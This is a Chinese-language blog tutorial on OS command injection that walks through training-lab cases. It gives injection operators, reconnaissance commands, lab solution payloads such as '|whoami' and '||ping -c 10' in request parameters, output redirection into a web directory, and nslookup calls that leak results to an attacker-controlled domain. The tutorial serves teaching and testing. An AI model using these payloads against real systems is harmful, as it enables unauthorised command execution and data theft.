WEB安全基础入门—操作系统命令注入(shell 注入)_文件参数 shell 命令注入(2)

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

以电商网站为例,经常有查询库存余量的功能,URL如下
https://insecure-website.com/stockStatus?productID=381&storeID=29
后台在处理此URL时,调用库存查询接口,由于历史原因,接口往往需要使用shell命令调用其他系统模块。类似如下命令
stockreport.pl 381 29

.pl 是perl语言源程序文件的扩展名,参数值将作为参数传入该“脚本”进行调用库存余量查询。

如果将该脚本参数改为如下
stockreport.pl & echo aiwefwlguh & 29

&为系统命令分隔符,会将上述一条命令差分为3条系统命令,显示结果如下:

Error - productID was not provided  (stockreport.pl未得到有效参数,报错)
aiwefwlguh(echo命令执行)
29: command not found (系统无法辨别的命令)

例题 1

3. 常用命令

发现漏洞后,应执行一些基础命令,查看相关系统信息。

目标LinuxWindows
当前用户名whoamiwhoami
操作系统uname -aver
网络配置ifconfigipconfig /all
网络连接状态netstat -annetstat -an
运行进程ps -eftasklist

4. 命令注入盲注漏洞

有些命令注入命令,不会随响应包响应任何结果。如反馈信息页,当用户完成了反馈,点击提交后。系统允许会生成如下邮件命令发送给管理员
mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com
这个命令就算存在的命令注入漏洞,但是在用户web端不会有任何回显。
但我们可以尝试以下方式进行测试漏洞是否存在

利用时间延迟测试漏洞存在

& ping -c 10 127.0.0.1 &
系统若存在漏洞,将会发起10次ping命令,导致响应时间延迟。

例题2

利用输出重定向来获取结果

& whoami > /var/www/static/whoami.txt &
若命令执行成功,命令执行结果将会写入路径下的whoami.txt文件中。若能成功读取该文件,就能获取结果。

例题3

利用带外技术(OAST)获取结果

& nslookup kgji2ohoyw.web-attacker.com &
& nslookup whoami.kgji2ohoyw.web-attacker.com &
使用命令nslookup来发起DNS对特定域名(攻击者控制的域名)的查询。通过查询访问记录获取结果

例题4、5

5. 常用注入操作符

window与类linux系统通用
  • &
  • &&
  • |
  • ||
类linux专用
  • 0x0a or \n (换新行)
类linux行内命令执行
  • command
  • $(command)

注意:命令注入要注意是否有引号等包裹,注意闭合后溢出,命令才能执行

6. 漏洞实例

1. 操作系统命令注入,简单案例 (OS command injection, simple case
  • 目标

在查看库存量功能处存在命令执行漏洞。执行whoami命令回显当前用户

  • 解题详情

productId=1&storeId=1|ps%20-ef
productId=1&storeId=1|whoami
productId=1&storeId=1;whoami

2. 带有时延的操作系统命令盲注入 (Blind OS command injection with time delays
  • 目标

在问题反馈功能处存在盲注命令执行漏洞,执行盲注导致10s延迟

  • 解题详情

name=fssa&email=123%40123.com||ping%20-c%2010%20192.168.1.1||&subject=13&message=adfs
name=fssa&email=123%40123.com;ping%20-c%2010%20192.168.1.1;&subject=13&message=adfs

3. 带有输出重定向的盲注操作系统命令注入(Blind OS command injection with output redirection
  • 目标

在问题反馈功能处存在盲注命令执行漏洞,执行whoami命令,将结果输出重定向到/var/www/images/,获取结果。

  • 解题详情

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以戳这里获取

础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!**

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以戳这里获取

  • 30
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值